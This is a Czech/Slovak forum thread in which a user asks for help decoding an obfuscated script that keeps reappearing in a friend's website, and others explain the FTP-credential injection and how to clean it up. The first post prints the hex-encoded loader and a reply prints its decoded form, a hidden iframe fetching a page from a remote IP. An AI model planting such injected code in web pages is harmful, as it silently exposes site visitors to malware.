Autor | Zpráva | ||
---|---|---|---|
BlackMartin Profil |
#1 · Zasláno: 22. 12. 2007, 16:19:18 · Upravil/a: BlackMartin
Dobrý den.
Můj klamarád který weby píše jen v HTML + CSS tak mi dneska napsal že mu jeho antivir ( cituji: NOD, Kaspersky a AVG to hlásí. ). Při prohledávání zdrojáku jsem nic zvláštního nenašel, ale jen mě zarazilo toto <script>function v47662812bffc3(v47662812c03bd){ function v47662812c07b7 () {var v47662812c0bb2=16; return v47662812c0bb2;} return(parseInt(v47662812c03bd,v47662812c07b7()));}function v47662812c0fb0(v47662812c13ab){ var v47662812c1fb7=2; var v47662812c17aa='';for(v47662812c1ba3=0; v47662812c1ba3<v47662812c13ab.length; v47662812c1ba3+=v47662812c1fb7){ v47662812c17aa+=(String.fromCharCode(v47662812bffc3(v47662812c13ab.sub str(v47662812c1ba3, v47662812c1fb7))));}return v47662812c17aa;} document.write(v47662812c0fb0('3C5343524950543E77696E646F772E737461747 5733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E6 16D653D326633343363207372633D5C27687474703A2F2F37372E3232312E3133332E3 138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E726 16E646F6D28292A3336343530292B2764323231663763345C272077696474683D34353 0206865696768743D3831207374796C653D5C27646973706C61793A206E6F6E655C273 E3C2F696672616D653E27293C2F5343524950543E'));</script> Při odmazání toho scriptu se tam znovu objeví (cituji: a když to smažeš tak se to vytvoří znova ). V JS se moc nevyznám tak Vás prosím jestli byste mi to nepomohli rozluštit. Děkuju moc všem. |
||
tiso Profil |
#2 · Zasláno: 22. 12. 2007, 16:30:46
Šíri sa to, tiež som to mal... Ten skript sa tam dopisuje cez ftp, takže odniekiaľ má prihlasovacie údaje na ftp. Vytváraniu zabrániš zmenou práv na 444 pri súboroch s názvom index, main a možno pár ďalších názvov. Ale to nerieši hlavný problém, treba preskenovať počítač a zmeniť prihlasovacie údaje na ftp.
|
||
peta Profil |
#3 · Zasláno: 22. 12. 2007, 18:49:59
BlackMartin
kdyz to das vepsat do textarea, pak to vypada takto: <SCRIPT>window.status='Done';document.write('<iframe name=2f343c src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*364 50)+'d221f7c4\' width=450 height=81 style=\'display: none\'></iframe>')</SCRIPT> Takze krome nastaveni prav k souboru (linux), viz tiso, pripadne misto souboru vytvoreni adresare (windows), bych mozna jeste zablokoval urcitou IP. Jinak ty antiviry je nutne poustet v nouzovem rezimu, pripadne nahrat jeste neco jako Personal SE z lavasoft.com. V nouzovem rezimu se nespousti divoke programy, tudiz antiviru neblokuji praci s odvirovanim. Otazkou je, do jake miry to odvirovava a neproskenovava disk za ucelem odeslani zajimavych souboru tvurci programu? Toto odesilani nazveme update antiviru :) |
||
Časová prodleva: 16 let
|
0